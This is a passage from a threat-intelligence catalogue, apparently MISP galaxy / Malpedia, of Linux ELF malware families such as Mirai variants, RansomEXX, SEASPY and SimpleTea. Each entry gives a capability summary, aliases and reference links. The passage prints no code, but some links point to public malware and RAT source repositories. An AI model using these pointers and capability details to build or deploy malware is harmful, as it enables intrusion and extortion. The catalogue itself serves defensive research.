https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt

https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts

https://community.riskiq.com/article/d8a78daf

https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet

https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://unit42.paloaltonetworks.com/cve-2020-17496/

https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html

https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/

https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/

https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/

https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/

https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/

https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/

https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/

https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/

http://osint.bambenekconsulting.com/feeds/

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.youtube.com/watch?v=KVJyYTie-Dc

https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/

https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/

https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/

https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants

https://github.com/jgamblin/Mirai-Source-Code

Monti

A ransomware, derived from the leaked Conti source code.

The tag is: misp-galaxy:malpedia="Monti"

Monti is also known as:

Table 2404. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.monti

https://resources.prodaft.com/wazawaka-report

https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html

MrBlack

MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.

MrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.

The tag is: misp-galaxy:malpedia="MrBlack"

MrBlack is also known as:

  • AESDDoS

  • Dofloo

Table 2408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack

https://news.drweb.com/?i=5760&c=23&lng=en

https://blog.syscall.party/post/aes-ddos-analysis-part-1/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

Mumblehard

The tag is: misp-galaxy:malpedia="Mumblehard"

Mumblehard is also known as:

Table 2409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mumblehard

https://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf

Nextcry

Ransomware used against Linux servers.

The tag is: misp-galaxy:malpedia="Nextcry"

Nextcry is also known as:

Table 2410. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry

https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/

Nimbo-C2 (ELF)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It’s written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

The tag is: misp-galaxy:malpedia="Nimbo-C2 (ELF)"

Nimbo-C2 (ELF) is also known as:

Table 2412. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.nimbo_c2

https://github.com/itaymigdal/Nimbo-C2

NiuB

Golang-based RAT that offers execution of shell commands and download+run capability.

The tag is: misp-galaxy:malpedia="NiuB"

NiuB is also known as:

Table 2413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.niub

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/

NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

The tag is: misp-galaxy:malpedia="NOTROBIN"

NOTROBIN is also known as:

  • remove_bds

Table 2414. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/

https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html

https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/

https://news.sophos.com/en-us/2020/05/21/asnarok2/

https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html

https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

OrBit

According to stormshield, Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.

The tag is: misp-galaxy:malpedia="OrBit"

OrBit is also known as:

Table 2415. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.orbit

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

p0sT5n1F3r

According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.

The tag is: misp-galaxy:malpedia="p0sT5n1F3r"

p0sT5n1F3r is also known as:

Table 2417. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r

https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf

P2Pinfect

P2Pinfect is a fast-growing multi platform botnet, the purpose of which is still unknown. Written in Rust, it is compatible with Windows and Linux, including a MIPS variant for Linux based routers and IoT devices. It is capable of brute forcing SSH logins and exploiting Redis servers in order to propagate itself both to random IPs on the internet and to hosts it can find references to in files present on the infected system.

The tag is: misp-galaxy:malpedia="P2Pinfect"

P2Pinfect is also known as:

Table 2418. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.p2pinfect

https://www.cadosecurity.com/p2pinfect-new-variant-targets-mips-devices/

https://www.cadosecurity.com/redis-p2pinfect/

https://www.cadosecurity.com/cado-security-labs-researchers-witness-a-600x-increase-in-p2pinfect-traffic/

https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/

pbot

P2P botnet derived from the Mirai source code.

The tag is: misp-galaxy:malpedia="pbot"

pbot is also known as:

Table 2419. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot

https://www.cert.org.cn/publish/main/11/2021/20210628133948926376206/20210628133948926376206_.html

Pink

A botnet with P2P and centralized C&C capabilities.

The tag is: misp-galaxy:malpedia="Pink"

Pink is also known as:

Table 2424. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pink

https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/

https://blog.netlab.360.com/pink-en/

Poseidon (ELF)

Part of Mythic C2, written in Golang.

The tag is: misp-galaxy:malpedia="Poseidon (ELF)"

Poseidon (ELF) is also known as:

Table 2426. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.poseidon

https://cert.gov.ua/article/6123309

https://github.com/MythicAgents/poseidon

PRISM

The tag is: misp-galaxy:malpedia="PRISM"

PRISM is also known as:

  • waterdrop

Table 2427. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.prism

https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar

PrivetSanya

Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.

The tag is: misp-galaxy:malpedia="PrivetSanya"

PrivetSanya is also known as:

Table 2428. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.privet_sanya

https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/

Pro-Ocean

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

The tag is: misp-galaxy:malpedia="Pro-Ocean"

Pro-Ocean is also known as:

Table 2430. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean

https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/

https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/

pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (ELF)"

pupy (ELF) is also known as:

Table 2431. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy

https://github.com/n1nj4sec/pupy

https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

  1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.

  2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.

  3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

The tag is: misp-galaxy:malpedia="QNAPCrypt"

QNAPCrypt is also known as:

  • eCh0raix

Table 2433. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt

https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/

https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/

https://www.anomali.com/blog/the-ech0raix-ransomware

https://www.qnap.com/en/security-advisory/QSA-20-02

https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/

https://www.ibm.com/downloads/cas/Z81AVOY7

https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf

https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/

QUIETEXIT

Mandiant observed this backdoor being observed by UNC3524. It is based on the open-source Dropbear SSH source code.

The tag is: misp-galaxy:malpedia="QUIETEXIT"

QUIETEXIT is also known as:

Table 2435. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.quietexit

https://www.mandiant.com/resources/unc3524-eye-spy-email

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

RansomEXX (ELF)

According to SentineOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.

The tag is: misp-galaxy:malpedia="RansomEXX (ELF)"

RansomEXX (ELF) is also known as:

  • Defray777

Table 2439. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware

https://securityintelligence.com/x-force/ransomexx-upgrades-rust/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.sentinelone.com/anthology/ransomexx/

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

RansomExx2

According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.

The tag is: misp-galaxy:malpedia="RansomExx2"

RansomExx2 is also known as:

Table 2440. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx2

https://securityintelligence.com/x-force/ransomexx-upgrades-rust/

RaspberryPiBotnet

The tag is: misp-galaxy:malpedia="RaspberryPiBotnet"

RaspberryPiBotnet is also known as:

Table 2442. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet

https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/

rat_hodin

The tag is: misp-galaxy:malpedia="rat_hodin"

rat_hodin is also known as:

Table 2443. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin

https://github.com/Thibault-69/RAT-Hodin-v2.5

rbs_srv

The tag is: misp-galaxy:malpedia="rbs_srv"

rbs_srv is also known as:

Table 2444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv

https://github.com/Thibault-69/Remote_Shell

RedAlert Ransomware

Ransomware that targets Linux VMware ESXi servers. Encryption procedure uses the NTRUEncrypt public-key encryption algorithm.

The tag is: misp-galaxy:malpedia="RedAlert Ransomware"

RedAlert Ransomware is also known as:

  • N13V

Table 2446. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert

https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/

REvil (ELF)

ELF version of win.revil targeting VMware ESXi hypervisors.

The tag is: misp-galaxy:malpedia="REvil (ELF)"

REvil (ELF) is also known as:

  • REvix

Table 2449. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil

https://home.treasury.gov/news/press-releases/jy0471

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://twitter.com/IntezerLabs/status/1452980772953071619

http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html

https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version

https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya

https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://twitter.com/VK_Intel/status/1409601311092490248?s=20

https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/

https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf

https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/

https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/

https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released

https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend

https://angle.ankura.com/post/102hcny/revix-linux-ransomware

https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil

https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf

https://www.youtube.com/watch?v=mDUMpYAOMOo

https://analyst1.com/file-assets/History-of-REvil.pdf

https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin

https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil

https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo

https://twitter.com/VK_Intel/status/1409601311092490248

https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5

https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20

https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://threatpost.com/ransomware-revil-sites-disappears/167745/

https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment

https://malienist.medium.com/revix-linux-ransomware-d736956150d0

https://www.flashpoint-intel.com/blog/revil-disappears-again/

https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021

https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa

https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://www.bbc.com/news/technology-59297187

https://github.com/f0wl/REconfig-linux

https://ke-la.com/will-the-revils-story-finally-be-over/

https://www.youtube.com/watch?v=ptbNMlWxYnE

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Rex

The tag is: misp-galaxy:malpedia="Rex"

Rex is also known as:

Table 2450. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex

https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/

RHOMBUS

The tag is: misp-galaxy:malpedia="RHOMBUS"

RHOMBUS is also known as:

Table 2451. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus

https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/

Roboto

P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.

The tag is: misp-galaxy:malpedia="Roboto"

Roboto is also known as:

Table 2453. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto

https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin

https://blog.netlab.360.com/the-awaiting-roboto-botnet-en

RotaJakiro

RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.

The tag is: misp-galaxy:malpedia="RotaJakiro"

RotaJakiro is also known as:

Table 2454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

Royal Ransom (ELF)

According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.

The tag is: misp-galaxy:malpedia="Royal Ransom (ELF)"

Royal Ransom (ELF) is also known as:

  • Royal

  • Royal_unix

Table 2455. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

https://unit42.paloaltonetworks.com/royal-ransomware/

SALTWATER

According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library, and amounts to five components, most of which are referred to as "Channels" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.

The tag is: misp-galaxy:malpedia="SALTWATER"

SALTWATER is also known as:

Table 2457. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.saltwater

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

SEASPY

According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the Threat Actor’s Command-and-Control through TCP packets. When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks the network packet captured for a hard-coded string. When the right sequence of packet is captured, it establishes a TCP reverse shell to the C2 server for further exploitation. This allows the TA to execute arbitrary commands on the compromised system. The malware is based on an open-source backdoor program named "cd00r".

The tag is: misp-galaxy:malpedia="SEASPY"

SEASPY is also known as:

Table 2460. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy

https://www.cisa.gov/news-events/analysis-reports/ar23-209b

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

Shishiga

The tag is: misp-galaxy:malpedia="Shishiga"

Shishiga is also known as:

Table 2462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga

https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/

SimpleTea (ELF)

SimpleTea for Linux is an HTTP(S) RAT.

It was discovered in Q1 2023 as an instance of the Lazarus group’s Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.

It’s an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.

It supports basic commands that include operations on the victim’s filesystem, manipulation with its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.

SimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.

The tag is: misp-galaxy:malpedia="SimpleTea (ELF)"

SimpleTea (ELF) is also known as:

  • SimplexTea

Table 2465. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.simpletea

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

The tag is: misp-galaxy:malpedia="SLAPSTICK"

SLAPSTICK is also known as:

Table 2466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick

https://www.mandiant.com/resources/unc2891-overview

https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html

SnappyTCP

According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. SeaTurtle has used SnappyTCP at least between 2021 and 2023.

The tag is: misp-galaxy:malpedia="SnappyTCP"

SnappyTCP is also known as:

Table 2467. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.snappy_tcp

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html

https://www.huntandhackett.com/blog/turkish-espionage-campaigns

Spamtorte

The tag is: misp-galaxy:malpedia="Spamtorte"

Spamtorte is also known as:

Table 2469. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte

https://cis.verint.com/2016/11/08/spamtorte-version-2/

SpeakUp

The tag is: misp-galaxy:malpedia="SpeakUp"

SpeakUp is also known as:

Table 2470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

SprySOCKS

The tag is: misp-galaxy:malpedia="SprySOCKS"

SprySOCKS is also known as:

Table 2473. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.spry_socks

https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html

STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

The tag is: misp-galaxy:malpedia="STEELCORGI"

STEELCORGI is also known as:

Table 2476. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://www.mandiant.com/resources/unc2891-overview

https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html

https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/

Sunless

